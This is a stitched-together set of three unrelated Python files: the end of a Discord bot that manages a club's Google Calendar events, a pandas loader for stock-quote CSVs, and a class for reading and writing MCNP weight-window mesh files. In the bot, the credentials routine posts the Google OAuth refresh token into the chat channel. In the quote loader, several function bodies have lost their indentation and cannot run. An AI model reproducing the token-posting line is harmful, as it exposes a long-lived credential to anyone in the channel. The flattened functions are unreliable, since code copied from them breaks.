        # with open('refresh.token', 'w+') as f:
        #     f.write(credentials.refresh_token)
        await ctx.send(credentials.refresh_token)
    #credentials = tools.run_flow(flow, store)
    # print('Storing credentials to ' + credential_path)
    return credentials
def convert_time(str_time):
    """Split an RFC3339 timestamp into (date, 12-hour clock string).

    '2020-05-20T14:30:00-04:00' -> ('2020-05-20', '2:30 PM').
    All-day events supply a bare date (Google sends 'date' instead of
    'dateTime'); for those the time part is returned as '' instead of
    raising, which previously crashed get_events.
    """
    if 'T' not in str_time:
        # all-day event: only a date, no time-of-day component
        return str_time, ''
    date_part, time_part = str_time.split('T', 1)
    # Keep only HH:MM:SS; this drops any UTC offset regardless of its sign
    # ('-05:00', '+01:00') or a trailing 'Z' — the old split('-') choked on
    # positive offsets.
    mil_time = time_part[:8]
    clock = datetime.datetime.strptime(mil_time, '%H:%M:%S').strftime('%I:%M %p')
    # strip %I's zero padding ('02:30 PM' -> '2:30 PM')
    if clock.startswith('0'):
        clock = clock[1:]
    return date_part, clock
async def get_events(ctx, client, is_today):
    """Send an embed listing upcoming UMARL calendar events to the channel.

    Fetches up to 15 upcoming events from the Google Calendar; when
    is_today is True, only events up to the end of the current local day
    are included.  Each event field shows its start time, a link to the
    calendar entry, and (when the description embeds a URL) a tournament
    link.
    """
    CREDS = await get_credentials(ctx, client)
    service = build('calendar', 'v3', credentials=CREDS)
    # Call the Calendar API
    now = datetime.datetime.utcnow().isoformat() + 'Z'  # 'Z' indicates UTC time
    # print(service.calendarList().list(pageToken=None).execute())
    if is_today:
        # cap the window at local midnight so only today's events show
        date = datetime.date.today().strftime('%Y-%m-%d')
        events_result = service.events().list(calendarId=UMARL_CALENDAR_ID, timeMin=now,
                                              maxResults=15, singleEvents=True,
                                              orderBy='startTime', timeMax=date + 'T23:59:59' + TIME_ZONE_STR).execute()
    else:
        events_result = service.events().list(calendarId=UMARL_CALENDAR_ID, timeMin=now,
                                              maxResults=15, singleEvents=True,
                                              orderBy='startTime').execute()
    events = events_result.get('items', [])
    #print(events)
    if not events:
        calendar_output_embed = discord.Embed(
            title=events_result['summary'],
            description='No upcoming events!',
            color=discord.Color.red())
    else:
        calendar_output_embed = discord.Embed(
            title=events[0]['organizer'].get('displayName'),
            color=discord.Color.dark_teal())
        for event in events:
            # all-day events carry 'date' instead of 'dateTime'
            start = event['start'].get('dateTime', event['start'].get('date'))
            time = convert_time(start)
            date = time[0].split('-')
            date_time_date= datetime.date(int(date[0]), int(date[1]), int(date[2]))
            month = date_time_date.strftime('%b')
            day = date_time_date.weekday()
            day_str = WEEKDAYS[day]
            title = ''  # NOTE(review): unused — confirm it can be removed
            calendar_event_link = '[Calendar Event Link](' + event['htmlLink'] + ')'
            event_desc = time[1] + ' ' + day_str + ' ' + month + ' ' + date[2] + ' ' + date[0] + '\n' + calendar_event_link
            if 'description' in event and '<a href=' in event['description'].strip():
                # print(event['description'])
                # the first anchor in the description is assumed to be the
                # tournament link — TODO confirm against how events are added
                soup = bs4.BeautifulSoup(event['description'])
                aTags = soup.find_all("a")
                urls = [tag['href'] for tag in aTags if 'href' in tag.attrs]
                te_link = '[Tournament Event Link](' + urls[0] + ')' # tournament link needs to be the first url
                event_desc += '\n' + te_link
            calendar_output_embed.add_field(name=event['summary'], value= event_desc, inline=False)
    await ctx.send(embed=calendar_output_embed)
async def set_time(ctx, starttime_arg):
    """Parse a 12-hour clock string ('7:30 pm') into 'HH:MM:SS<offset>'.

    Sends an error embed to the channel and returns '' when the input is
    malformed or out of range.
    """
    if not (starttime_arg.endswith('pm') or starttime_arg.endswith('am')):
        await ctx.send(embed=discord.Embed(
            description="Invalid time format. Please end with 'am' or 'pm'! ex. 12:00 pm",
            color=discord.Color.red()))
        return ''
    time_value = starttime_arg[:-2].rstrip()  # trim off 'pm' or 'am'
    hours_min = time_value.split(':')
    if len(hours_min) != 2:
        await ctx.send(embed=discord.Embed(
            description="Invalid time format. Please use ex. 12:00 pm",
            color=discord.Color.red()))
        return ''
    hours = int(hours_min[0])
    minutes = int(hours_min[1])
    # 12-hour -> 24-hour: on a 12-hour clock '12' means hour zero before the
    # am/pm shift, so '12:00 am' -> 00:00 and '12:00 pm' -> 12:00.  (The old
    # code added 12 straight to the literal 12, rejecting noon as invalid
    # and mis-reading midnight as 12:xx.)
    if hours == 12:
        hours = 0
    if starttime_arg.endswith('pm'):
        hours += 12
    if hours > 23 or minutes > 59 or hours < 0 or minutes < 0:
        await ctx.send(embed=discord.Embed(description="Invalid time!", color=discord.Color.red()))
        return ''
    return str(hours).zfill(2) + ':' + str(minutes).zfill(2) + ':00' + TIME_ZONE_STR
async def check_and_format_date(ctx, date_arg):
    """Validate a 'year-month-day' string and zero-pad month and day.

    Returns the normalized 'YYYY-MM-DD' string, or '' (after sending an
    error embed) when the input is malformed or not a real calendar date.
    """
    date_pattern = r"\d{4}-\b(0?[1-9]|[1][0-2])\b-\b(0?[1-9]|[12][0-9]|3[01])\b"
    # guard clause: reject anything that is not year-month-day shaped
    if not re.match(date_pattern, date_arg):
        await ctx.send(embed=discord.Embed(
            description="Invalid date! Please use a date in this format: year-month-day.\n" \
            "ex. 2020-5-20",
            color=discord.Color.red()))
        return ''
    parts = date_arg.split('-')
    # let datetime reject impossible dates such as February 30th
    try:
        datetime.datetime(int(parts[0]), int(parts[1]), int(parts[2]))
    except ValueError:
        await ctx.send(embed=discord.Embed(
            description="Invalid date! Please use a real date.",
            color=discord.Color.red()))
        return ''
    # zero-pad single-digit month/day so the result is always YYYY-MM-DD
    if len(parts[1]) < 2:
        date_arg = date_arg[:5] + '0' + date_arg[5:]
    if len(parts[2]) < 2:
        date_arg = date_arg[:8] + '0' + date_arg[8:]
    return date_arg
async def set_end_time(ctx, duration, start_time):
    """Compute the event end timestamp: start_time + duration minutes.

    start_time is the bot's own 'YYYY-MM-DDTHH:MM:SS±HH:MM' string; the
    return value is in the same format.  ctx is unused but kept so the
    signature matches the other set_* helpers.
    """
    # datetime.fromisoformat handles exactly the ISO strings this bot
    # builds, so the third-party dateutil parser is unnecessary here.
    start_datetime = datetime.datetime.fromisoformat(start_time)
    end_datetime = start_datetime + datetime.timedelta(minutes=int(duration))
    end = end_datetime.strftime("%Y-%m-%dT%H:%M:%S")
    return end + TIME_ZONE_STR
async def add_events(ctx, client, args):
    """
    Create a Google Calendar event from command arguments.

    args: [date, start time, duration in minutes, summary, optional link].
    Sends an error embed and returns early when any argument is invalid.
    """
    CREDS = await get_credentials(ctx, client)
    service = build('calendar', 'v3', credentials=CREDS)
    date_arg = args[0].strip()
    starttime_arg = args[1].strip().lower()
    duration = args[2].strip()
    # Duration bounds: 15 minutes up to a full day.
    if int(duration) < 15 or int(duration) > 1440:
        await ctx.send(embed=discord.Embed(
            description="Invalid duration, please input a duration (in minutes) between 15 and 1440.",
            color=discord.Color.red()))
        return
    summary = args[3].strip()
    if len(args) > 4:
        link = args[4].strip()
        # URL validation: scheme, domain/localhost/IP, optional port, optional path.
        regex = re.compile(
            r'^(?:http|ftp)s?://' # http:// or https://
            r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
            r'localhost|' #localhost...
            r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
            r'(?::\d+)?' # optional port
            r'(?:/?|[/?]\S+)$', re.IGNORECASE)
        if not re.match(regex, link):
            await ctx.send(embed=discord.Embed(
                description="Invalid value used for link parameter.",
                color=discord.Color.red()))
            return
    else:
        link = ''
    date_str = await check_and_format_date(ctx, date_arg)
    if len(date_str) < 1:
        # Error embed already sent by the helper.
        return
    start_time = await set_time(ctx, starttime_arg)
    if len(start_time) < 1:
        # Error embed already sent by the helper.
        return
    end_time = await set_end_time(ctx, duration, date_str + 'T' + start_time)
    # to make all day events use 'date' field instead of 'dateTime' field and just use date (ex. 2020-05-20)
    new_event = {
        'summary': summary,
        'description': '<a href=\"' + link + '\">' + link + '</a> ',
        'start': {
            'dateTime': date_str + 'T' + start_time,
            'timeZone': 'America/New_York'
        },
        'end': {
            'dateTime': end_time,
            'timeZone': 'America/New_York'
        }
    }
    event = service.events().insert(calendarId=UMARL_CALENDAR_ID, body=new_event).execute()
    await ctx.send(embed=discord.Embed(
        description="Event created with name:\n" + summary,
        color=discord.Color.green()))
def retrieve_event_id(name, events):
    """
    Search `events` for an entry whose summary matches `name`
    (case-insensitive).

    Returns a (event id, event summary) pair with the calendar's original
    capitalization, or ('', '') when nothing matches. If several events
    match, the last one wins.
    """
    wanted = name.lower()
    matched_id, matched_name = '', ''
    for entry in events:
        if entry['summary'].lower() == wanted:
            matched_id = entry['id']
            matched_name = entry['summary']
    return matched_id, matched_name
def retrieve_all_events(service, calendar_id):
    """
    Gets events from the calendar with the matching calendar id.

    Only future events are returned (timeMin is now), flattened to single
    events and ordered by start time. Returns a possibly-empty list.
    """
    # Call the Calendar API
    now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time
    events_result = service.events().list(calendarId=calendar_id, timeMin=now,
                                        singleEvents=True, orderBy='startTime').execute()
    return events_result.get('items', [])
async def delete_event(ctx, client, contents):
    """
    Delete the calendar event whose summary matches `contents`
    (case-insensitive) and report the outcome to the channel.
    """
    CREDS = await get_credentials(ctx, client)
    service = build('calendar', 'v3', credentials=CREDS)
    events = retrieve_all_events(service, UMARL_CALENDAR_ID)
    if not events:
        await ctx.send(embed=discord.Embed(
            description='No events exist on the calendar.',
            color=discord.Color.red()))
        return
    event_id, event_name = retrieve_event_id(contents, events)
    # An empty id means no event matched the requested name.
    if len(event_id) > 0:
        service.events().delete(calendarId=UMARL_CALENDAR_ID, eventId=event_id).execute()
        await ctx.send(embed=discord.Embed(
            description='Event with name: \"' + event_name + '\" has been successfully deleted',
            color=discord.Color.green()))
    else:
        await ctx.send(embed=discord.Embed(
            description='No event exists with name:\n' + contents,
            color=discord.Color.red()))
async def edit_event_time(ctx, client, args):
    """
    Update an existing event's start time and, optionally, its date and
    duration.

    args: [summary, start time, optional date, optional duration (minutes)].
    Omitted date/duration are taken from the existing event. Sends an
    error embed and returns early on any invalid argument or when no
    event matches the summary.
    """
    CREDS = await get_credentials(ctx, client)
    service = build('calendar', 'v3', credentials=CREDS)
    summary = args[0].strip()
    starttime_arg = args[1].strip().lower()
    start_time = await set_time(ctx, starttime_arg)
    if len(start_time) < 1:
        # Error embed already sent by the helper.
        return
    events = retrieve_all_events(service, UMARL_CALENDAR_ID)
    if not events:
        await ctx.send(embed=discord.Embed(
            description='No events exist on the calendar.',
            color=discord.Color.red()))
        return
    event_id, event_name = retrieve_event_id(summary, events)
    # Guard against a missing match: previously an empty event_id was passed
    # straight to events().get(), which fails. Mirrors delete_event's handling.
    if len(event_id) < 1:
        await ctx.send(embed=discord.Embed(
            description='No event exists with name:\n' + summary,
            color=discord.Color.red()))
        return
    event = service.events().get(calendarId=UMARL_CALENDAR_ID, eventId=event_id).execute()
    if len(args) > 2:
        date_arg = args[2].strip()
        date_str = await check_and_format_date(ctx, date_arg)
        if len(date_str) < 1:
            return
    else:
        # Keep the event's existing date.
        date_str = event['start']['dateTime'].split('T')[0]
    if len(args) > 3:
        duration = args[3].strip()
        if int(duration) < 15 or int(duration) > 1440:
            await ctx.send(embed=discord.Embed(
                description="Invalid duration, please input a duration (in minutes) between 15 and 1440.",
                color=discord.Color.red()))
            return
    else:
        # Keep the event's existing duration (derived from start/end).
        start_datetime = dtparse(event['start']['dateTime'])
        end_datetime = dtparse(event['end']['dateTime'])
        minutes_difference_timedelta = end_datetime - start_datetime
        duration = int(minutes_difference_timedelta.seconds / 60)
    event['start']['dateTime'] = date_str + 'T' + start_time
    event['end']['dateTime'] = await set_end_time(ctx, duration, date_str + 'T' + start_time)
    updated_event = service.events().update(calendarId=UMARL_CALENDAR_ID, eventId=event_id, body=event).execute()
    await ctx.send(embed=discord.Embed(description="Event time updated!", color=discord.Color.green()))
|
from datetime import date, datetime, timedelta
from itertools import count
import numpy as np
import os
import pandas as pd
import psutil
# countPerDay = 85 # one quote data every 5 minutes, total it is 85 quotes per day per symbol
countPerDay = 29 # as it is resampled every 15 minutes, the countPerDay was changed from 85 to 29
symbolCount = 123
signalCount = 12
defaultDatePattern = '%Y%m%d'
quotesOnedayPath = "data/quotes_oneday_data"
targetSymbolIndex = 99 # target symbol is TECL, its index is 99 (starting from 0) in the dataframe for the same time
minuteFilterArray = [0, 15, 30, 45] # every 15 minutes
# minuteFilterArray = [0, 10, 20, 30, 40, 50] # every 10 minutes
def getMemoryUsed():
    """Return the amount of used virtual memory in MiB."""
    used_bytes = psutil.virtual_memory()[3]
    return int(used_bytes / 1024 / 1024)
def getFile(day):
    """Build the one-day quotes csv path for the given pandas Period `day`."""
    stamp = datetime.strftime(day.to_timestamp(), defaultDatePattern)
    return os.path.join(quotesOnedayPath, 'data_' + stamp + ".csv")
def minuteFilter(row):
    """Keep rows whose 'currentTime' minute lies on the resampling grid."""
    stamp = datetime.strptime(row['currentTime'], "%Y-%m-%d %H:%M:%S")
    return stamp.minute in minuteFilterArray
"""
- dropColumns shall be True, False is for testing purpose
"""
def readToDataFrame(startDate, endDate):
periodRange = pd.period_range(start=startDate, end=endDate, freq='D')
result = []
for day in periodRange:
file = getFile(day)
if os.path.isfile(file):
# print(f'read file for {day}')
df = pd.read_csv(file)
df = df[df.apply(minuteFilter, axis=1)]
result.append(df)
return pd.concat(result)
# tick starts from 0
def getArray(df, tick):
    """
    Convert one day-tick of the frame into a nested list shaped
    (countPerDay, symbolCount, features). Returns None when the slice
    does not hold a full day of data.
    """
    window = getSubDataFrame(df, tick)
    # Drop the non-numeric columns before converting to plain lists.
    window = window.drop(columns=['symbol', 'currentTime'])
    day_data = []
    for slot in range(countPerDay):
        lo = slot * symbolCount
        hi = lo + symbolCount
        if lo >= len(window):
            return None
        day_data.append(window[lo:hi].to_numpy().tolist())
    return day_data
"""
tick starts from 0
"""
def getSubDataFrame(df, tick):
startIndex = tick * symbolCount
endIndex = startIndex + countPerDay * symbolCount
return df[startIndex:endIndex]
def printSample(data):
    """Print the overall shape plus corner entries of a nested day-data list."""
    print('data shape: ', np.array(data).shape)
    first_slot = data[0]
    last_slot = data[countPerDay - 1]
    print(first_slot[0][0], first_slot[0][1])
    print(first_slot[122][0], first_slot[122][1])
    print(last_slot[0][0], last_slot[0][1])
    print(last_slot[122][0], last_slot[122][1])
if __name__ == '__main__':
    # Smoke test: load two days of quotes, report the memory cost, and
    # sample the first two day-ticks as nested python lists.
    startDate, endDate = '20210831', '20210901'
    memoryBefore = getMemoryUsed()
    df = readToDataFrame(startDate, endDate)
    print(len(df))
    memoryAfter = getMemoryUsed()
    print(f'memory used {memoryAfter - memoryBefore}M')
    data = getArray(df, 0)
    printSample(data)
    # assert data[0][99][0] == 'TECL'
    data = getArray(df, 1)
    printSample(data)
    # assert data[0][99][0] == 'TECL'
    print(type(data))
    print(type(data[0]))
    print(type(data[0][0]))
    print(type(data[0][0][0]))
    # A tick far beyond the two loaded days yields no data.
    assert getArray(df, 100) is None
|
<reponame>MC-kit/mckit-meshes
from typing import Any, Generator, List, NamedTuple, Optional, TextIO, Tuple, Union
import sys
from dataclasses import dataclass
from enum import IntEnum
import mckit_meshes.mesh.geometry_spec as gs
import mckit_meshes.utils as ut
import numpy as np
GeometrySpec = Union[gs.CartesianGeometrySpec, gs.CylinderGeometrySpec]
Point = np.ndarray
def ensure_float_arrays(*arrays: Any) -> Generator[np.ndarray, None, None]:
    """Yield every input converted to a float numpy array."""
    for array in arrays:
        yield np.asarray(array, dtype=float)
class Particles(IntEnum):
    """Particle kinds used to index the per-particle energy/weight parts.

    `n` and `p` are short aliases for `neutron` and `photon`.
    """
    neutron = 0
    photon = 1
    n = 0
    p = 1
# noinspection GrazieInspection
class WgtMesh:
    """
    Class to work with MCNP weight window files.

    Holds a geometry specification plus, per particle kind, the energy bin
    boundaries and a 4D weight array indexed (energy, i, j, k).
    """
    def __init__(
        self,
        geometry_spec: GeometrySpec,
        energies,
        weights,
    ):
        # Normalize inputs to float numpy arrays; validate() checks the shapes agree.
        self._energies: List[np.ndarray] = list(ensure_float_arrays(*energies))
        self._geometry_spec = geometry_spec
        self._weights: List[np.ndarray] = list(ensure_float_arrays(*weights))
        self.validate()
    def print_mcnp_generator_spec(self, io=None, ref="600 0 50", columns: int = 6):
        """Print MCNP weight-window generator cards (mesh + wwge) to `io`."""
        if io is None:
            io = sys.stdout
        print(f"mesh ref={ref}", file=io)
        self._geometry_spec.print(io, columns=columns)
        print("wwge:n", end=" ", file=io)
        second_indent = " " * 15
        # Skip the leading zero energy bound when printing.
        ut.print_n(
            gs.format_floats(self.energies[0][1:]),
            io=io,
            indent=second_indent,
            columns=columns,
        )
        if len(self.energies) > 1:
            # A photon part is present as well.
            print("wwge:p", end=" ", file=io)
            ut.print_n(
                gs.format_floats(self.energies[1][1:]),
                io=io,
                indent=second_indent,
                columns=columns,
            )
    def print_meshtal_spec(
        self,
        io: TextIO = None,
        tally_n_number: int = 14,
        tally_p_number: int = 24,
        columns: int = 6,
    ) -> None:
        """Print fmesh tally cards matching this mesh (neutron, optional photon)."""
        if io is None:
            io = sys.stdout
        print(f"fc{tally_n_number} === WW generation mesh for neutrons", file=io)
        print(f"fmesh{tally_n_number}:n", file=io)
        self._geometry_spec.print(io, columns=columns)
        indent = " " * 8
        print(indent, "emesh=", sep="", end="", file=io)
        second_indent = indent + " " * 6
        ut.print_n(
            gs.format_floats(self.energies[0][1:]),
            io=io,
            indent=second_indent,
            columns=columns,
        )
        if len(self.energies) > 1:
            print(f"fc{tally_p_number} === WW generation mesh for photons", file=io)
            print(f"fmesh{tally_p_number}:p", file=io)
            self._geometry_spec.print(io, columns=columns)
            print(indent, "emesh=", sep="", end="", file=io)
            # TODO dvp: try to use do_print_bins here
            ut.print_n(
                gs.format_floats(self.energies[1][1:]),
                io=io,
                indent=second_indent,
                columns=columns,
            )
    def validate(self):
        """Check that each weight array matches its energy bins and the geometry."""
        if len(self.weights) != len(self.energies):
            raise ValueError(
                f"Number of energy bins {len(self.energies)} is not equal to number of weight parts {len(self.weights)}"
            )
        for part, ebins in enumerate(self.energies):
            # Expected: one weight value per (energy group, i, j, k) voxel.
            expected_shape = tuple(
                [
                    ebins.size - 1,
                    self.ibins.size - 1,
                    self.jbins.size - 1,
                    self.kbins.size - 1,
                ]
            )
            if self.weights[part].shape != expected_shape:
                raise ValueError(
                    f"Incompatible number of ebins, voxels and weights: {self.weights[part].shape} != {expected_shape}"
                )
    @property
    def energies(self):
        """Per-particle lists of energy bin boundaries (leading 0 included)."""
        return self._energies
    @property
    def origin(self):
        """Mesh origin from the geometry specification."""
        return self._geometry_spec.origin
    @property
    def ibins(self):
        """Fine bin boundaries along the first axis."""
        return self._geometry_spec.ibins
    @property
    def jbins(self):
        """Fine bin boundaries along the second axis."""
        return self._geometry_spec.jbins
    @property
    def kbins(self):
        """Fine bin boundaries along the third axis."""
        return self._geometry_spec.kbins
    @property
    def count_voxels(self):
        """Total number of spatial voxels in the mesh."""
        return (self.ibins.size - 1) * (self.jbins.size - 1) * (self.kbins.size - 1)
    @property
    def weights(self) -> List[np.ndarray]:
        """Per-particle 4D weight arrays indexed (energy, i, j, k)."""
        return self._weights
    @property
    def neutron_weights(self) -> np.ndarray:
        """Weights for the neutron part (index 0)."""
        return self._weights[0]
    @property
    def photon_weights(self) -> np.ndarray:
        """Weights for the photon part (index 1); requires a two-part mesh."""
        assert len(self._weights) == 2, "Photon weights are not defined in the mesh"
        return self._weights[1]
    @property
    def is_cylinder(self) -> bool:
        """True when the underlying geometry is cylindrical."""
        return self._geometry_spec.cylinder
    @property
    def axs(self) -> Optional[np.ndarray]:
        """Cylinder axis vector, or None for a Cartesian mesh."""
        return self._geometry_spec.axs
    @property
    def vec(self) -> Optional[np.ndarray]:
        """Cylinder azimuthal reference vector, or None for a Cartesian mesh."""
        return self._geometry_spec.vec
    @property
    def count_parts(self) -> int:
        """Number of particle parts stored (1 or 2)."""
        return len(self.weights)
    def part(self, particle: Particles) -> Tuple[np.ndarray, np.ndarray]:
        """Return the (energies, weights) pair for the given particle kind."""
        return self.energies[particle], self.weights[particle]
    def __hash__(self):
        # NOTE(review): energies and weights are lists of ndarrays, which are
        # not hashable — calling hash() on an instance will raise. Confirm
        # whether this is ever actually invoked.
        return hash(
            (
                self._geometry_spec.__hash__(),
                self.energies,
                self.weights,
            )
        )
    def __eq__(self, other):
        """Equal when geometry, energy bins and all weight arrays match."""
        if not self.bins_are_equal(other):
            return False
        for p in range(len(self.weights)):
            if not np.array_equal(self.weights[p], other.weights[p]):
                return False
        return True
    def bins_are_equal(self, other: "WgtMesh") -> bool:
        """True when geometry and energy binning match `other` (weights ignored)."""
        if not isinstance(other, WgtMesh):
            # NOTE(review): the "{}" placeholder is never formatted — the class
            # is passed as a second RuntimeError argument instead.
            raise RuntimeError(
                "Invalid class of object to compare: {}", other.__class__
            )
        if self._geometry_spec == other._geometry_spec:
            le = len(self.energies)
            if le == len(other.energies):
                for i in range(le):
                    if not np.array_equal(self.energies[i], other.energies[i]):
                        return False
                return True
        return False
    def __add__(self, other: "WgtMesh") -> "WgtMesh":
        """Element-wise sum of weights; bins must match."""
        assert self.bins_are_equal(other)
        weights = list(a + b for a, b in zip(self.weights, other.weights))
        res = WgtMesh(
            self._geometry_spec,
            self.energies,
            weights,
        )
        return res
    def __sub__(self, other: "WgtMesh") -> "WgtMesh":
        """Element-wise difference of weights; bins must match."""
        assert self.bins_are_equal(other)
        weights = list(a - b for a, b in zip(self.weights, other.weights))
        res = WgtMesh(
            self._geometry_spec,
            self.energies,
            weights,
        )
        return res
    def __mul__(self, coeff: float) -> "WgtMesh":
        """Scale all weights by `coeff`."""
        weights = list(w * coeff for w in self.weights)
        res = WgtMesh(
            self._geometry_spec,
            self.energies,
            weights,
        )
        return res
    def __rmul__(self, coeff: float) -> "WgtMesh":
        return self.__mul__(coeff)
    # def __repr__(self):
    #     return f"WgtMesh({tuple(self.origin)}, {self.energies})"
    # noinspection SpellCheckingInspection
    def write(self, stream: TextIO) -> None:
        """Writes the mesh to stream.
        See WWINP format, MCNP User Manual, Appendix J, Table J.1
        Args;
            stream: a stream to write to
        """
        data = []
        # Header: file type, time dependence, particle count, parameter count.
        _if, _iv, _ni = 1, 1, len(self.energies)
        if self.is_cylinder:
            _nr = 16
        else:
            _nr = 10
        data += produce_strings([_if, _iv, _ni, _nr], "{0:10d}")
        # remove the first "\n"
        data = data[1:]
        _ne = [x.size - 1 for x in self._energies]
        data += produce_strings(_ne, "{0:10d}")
        _nfx = self.ibins.size - 1
        _nfy = self.jbins.size - 1
        _nfz = self.kbins.size - 1
        _x0, _y0, _z0 = self.origin
        # Coarse-mesh representation: interval counts + coarse boundaries per axis.
        _nfmx, _xm = gs.compute_intervals_and_coarse_bins(self.ibins)
        _ncx = len(_nfmx)
        _nfmy, _ym = gs.compute_intervals_and_coarse_bins(self.jbins)
        _ncy = len(_nfmy)
        _nfmz, _zm = gs.compute_intervals_and_coarse_bins(self.kbins)
        _ncz = len(_nfmz)
        _nwg = 1
        _data = [_nfx, _nfy, _nfz, _x0, _y0, _z0, _ncx, _ncy, _ncz]
        if self.is_cylinder:
            if self.axs is None:
                raise ValueError("axs is not specified in cylinder mesh")
            _xmax, _ymax, _zmax = self.axs
            if self.vec is None:
                raise ValueError("vec is not specified in cylinder mesh")
            _xr, _yr, _zr = self.vec
            _data += [_xmax, _ymax, _zmax, _xr, _yr, _zr]
            _nwg = 2
        _data += [_nwg]
        data += produce_strings(_data, "{0:#13.5g}")
        # Block 2
        _nc = [_ncx, _ncy, _ncz]
        _nfm = [_nfmx, _nfmy, _nfmz]
        _r = [_xm, _ym, _zm]
        for i in range(3):
            # Per axis: first boundary, then (fine count, boundary, ratio=1) triples.
            data1 = [_r[i][0]]
            for j in range(_nc[i]):
                data1 += [_nfm[i][j], _r[i][j + 1], 1]
            data += produce_strings(data1, "{0:#13.5g}")
        for p in range(_ni):
            data += produce_strings(
                self.energies[p][1:], "{0:#13.5g}"
            )  # omit the first zero
            data1 = []
            # TODO dvp: order of cycling and dimensions are not efficient:
            # the index changing faster should be the most inner in cycle.
            for e in range(_ne[p]):
                for k in range(_nfz):
                    for j in range(_nfy):
                        for i in range(_nfx):
                            data1.append(self._weights[p][e, i, j, k])
            data += produce_strings(data1, "{0:#13.5g}")
        stream.write("".join(data))
    @dataclass
    class _Reader:
        """Sequential token reader over a whitespace-split WWINP file body."""
        data: List[str]
        index: int = 0
        def get(self, items: int) -> List[str]:
            """Consume and return the next `items` raw tokens."""
            i = self.index
            self.index += items
            return self.data[i : self.index]
        def get_floats(self, items: int) -> Generator[float, None, None]:
            """Consume the next `items` tokens as floats."""
            return map(float, self.get(items))
        def get_ints(self, items: int) -> Generator[int, None, None]:
            """Consume the next `items` tokens as ints."""
            return map(int, self.get(items))
        def get_ints_written_as_floats(self, items: int) -> Generator[int, None, None]:
            # WWINP stores some integer fields in float notation (e.g. "2.0000").
            return map(int, self.get_floats(items))
        def skip(self, items: int = 1) -> None:
            """Advance past `items` tokens without returning them."""
            self.index += items
    # noinspection SpellCheckingInspection
    @classmethod
    def read(cls, f: TextIO) -> "WgtMesh":
        """Read an MCNP weights file.
        See format description at MCNP User Manual, Version 5 (p.489 or Appendix J, p. J-1)
        Args:
            f: Input file in WWINP format
        Returns:
            WgtMesh: loaded mesh.
        """
        _if, _iv, number_of_particles, number_of_parameters = (
            int(s) for s in f.readline().split()[:4]
        )
        reader = WgtMesh._Reader(f.read().split())
        sizes_of_energy_bins = tuple(reader.get_ints(number_of_particles))
        # cells along axes
        _nfx, _nfy, _nfz = reader.get_ints_written_as_floats(3)
        # origin
        _x0, _y0, _z0 = reader.get_floats(3)
        # coarse bins along axes
        _ncx, _ncy, _ncz = reader.get_ints_written_as_floats(3)
        # 16 parameters indicate a cylinder mesh with axis and reference vectors.
        if number_of_parameters == 16:
            _xmax, _ymax, _zmax, _xr, _yr, _zr = reader.get_floats(6)
            axs = np.array([_xmax, _ymax, _zmax], dtype=float)
            vec = np.array([_xr, _yr, _zr], dtype=float)
        else:
            axs = None
            vec = None
        # skip NWG
        reader.skip()
        # Per axis: 1 start token plus 3 tokens per coarse interval.
        delta = 3 * _ncx + 1
        _x = parse_coordinates(reader.get(delta))
        delta = 3 * _ncy + 1
        _y = parse_coordinates(reader.get(delta))
        delta = 3 * _ncz + 1
        _z = parse_coordinates(reader.get(delta))
        _e = []
        _w = []
        for p in range(number_of_particles):
            nep = sizes_of_energy_bins[p]
            if 0 < nep:
                ebins = np.fromiter(reader.get_floats(nep), dtype=float)
                # Restore the implicit leading zero bound.
                ebins = np.insert(ebins, 0, 0.0)
                _e.append(ebins)
                _wp = np.zeros((nep, _nfx, _nfy, _nfz), dtype=float)
                _wp_data = np.fromiter(reader.get_floats(_wp.size), dtype=float)
                # File order is x-fastest; unpack into (e, i, j, k) layout.
                for e in range(nep):
                    for k in range(_nfz):
                        for j in range(_nfy):
                            for i in range(_nfx):
                                cell_index = i + _nfx * (j + _nfy * (k + _nfz * e))
                                _wp[e, i, j, k] = _wp_data[cell_index]
                _w.append(_wp)
                # Sanity check: loop unpacking equals the vectorized transpose.
                assert np.all(
                    np.transpose(
                        _wp_data.reshape((nep, _nfz, _nfy, _nfx)), (0, 3, 2, 1)
                    )
                    == _wp
                )
        geometry_spec = make_geometry_spec(
            [_x0, _y0, _z0], _x, _y, _z, axs=axs, vec=vec
        )
        return cls(geometry_spec, _e, _w)
    def get_mean_square_distance_weights(self, point):
        """Build a mesh whose weights follow mean-square distance from `point`."""
        w = self._geometry_spec.get_mean_square_distance_weights(point)
        _w = []
        for _e in self.energies:
            # NOTE(review): `le` counts bin bounds (groups + 1), while validate()
            # expects groups = len - 1 along the energy axis — confirm intended.
            le = len(_e)
            t = w.reshape((1,) + self._geometry_spec.bins_shape)
            t = np.repeat(t, le, axis=0)
            _w.append(t)
        return WgtMesh(
            self._geometry_spec,
            self.energies,
            _w,
        )
    class MergeSpec(NamedTuple):
        # A mesh paired with its weighting factor (usually the run's NPS).
        wm: "WgtMesh"
        nps: int
    @classmethod
    def merge(cls, *merge_specs: Union[MergeSpec, Tuple["WgtMesh", int]]) -> MergeSpec:
        r"""Combine weight meshes produced from different runs with weighting factor.
        Note:
            Importance of a mesh voxel `i` is $1/w_i$ and is proportional to average portion $p_i$ of
            passing particle weight W to a tally for which the weight mesh is computed.
            To obtain combined weight on merging two meshes, we will combine the probabilities using weighting factors and
            use reciprocal of a result as a resulting weight of mesh voxel.
            The weighting factors are usually NPS (Number particles sampled) from a run on which a mesh was produced.
            The combined probability in resulting voxel `i` is:
            .. math::
                w_ij - weight in voxel i of mesh j
                n_j - nps - weighting factor on combining of mesh j
                p_ij = 1/w_ij - probability for voxel i of mesh j
                p_i = \frac{ \sum_j{n_j*p_ij} { \sum_j{n_j} }
            So, the resulting voxel `i` weight level is:
            .. math::
                w_i = \frac{1} {p_i}
        Args:
            merge_specs: iterable of pairs (WgtMesh, nps), where `nps` is weighting factor
        Returns:
            MergeSpec: merged weights and total nps (or sum of weighting factors)
        """
        first = merge_specs[0]
        if not isinstance(first, WgtMesh.MergeSpec):
            first = WgtMesh.MergeSpec(*first)  # convert tuple to MergeSpec
        if len(merge_specs) > 1:
            # Recursively merge the tail, then fold it into the head.
            second = WgtMesh.merge(*merge_specs[1:])
            merged_weights = []
            assert first.wm.bins_are_equal(second.wm)
            for i, weights in enumerate(first.wm.weights):
                nps_first, probabilities_first = prepare_probabilities_and_nps(
                    first.nps, weights
                )
